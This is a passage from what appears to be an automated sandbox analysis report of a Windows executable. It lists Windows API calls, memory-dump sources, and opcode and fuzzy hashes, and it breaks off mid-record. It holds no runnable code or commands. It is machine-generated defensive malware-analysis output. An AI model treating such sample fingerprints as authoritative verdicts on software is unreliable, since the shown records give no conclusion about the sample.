                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastMove
                                                                                            • String ID:
                                                                                            • API String ID: 55378915-0
                                                                                            • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                            • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                            • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                            • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                            • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorLoad
                                                                                            • String ID:
                                                                                            • API String ID: 3238433803-0
                                                                                            • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                            • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                            • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                            APIs
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                            • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderFreeKnownPathTask
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 969438705-544719455
                                                                                            • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                            • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                            • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                            • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                            • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocLock
                                                                                            • String ID:
                                                                                            • API String ID: 15508794-0
                                                                                            • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                            • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                                            • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                            • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                              • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                            • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                            • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                            • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                            APIs
                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoScroll
                                                                                            • String ID:
                                                                                            • API String ID: 629608716-0
                                                                                            • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                            • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                            • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                            • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                            APIs
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                              • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                              • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3319771486-0
                                                                                            • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                            • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                            • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                            • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                            • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                            • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                            • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                            • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                            • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                            • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                            • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                            • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                            • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                            APIs
                                                                                            • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExtentPointText
                                                                                            • String ID:
                                                                                            • API String ID: 566491939-0
                                                                                            • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                            • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                            • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
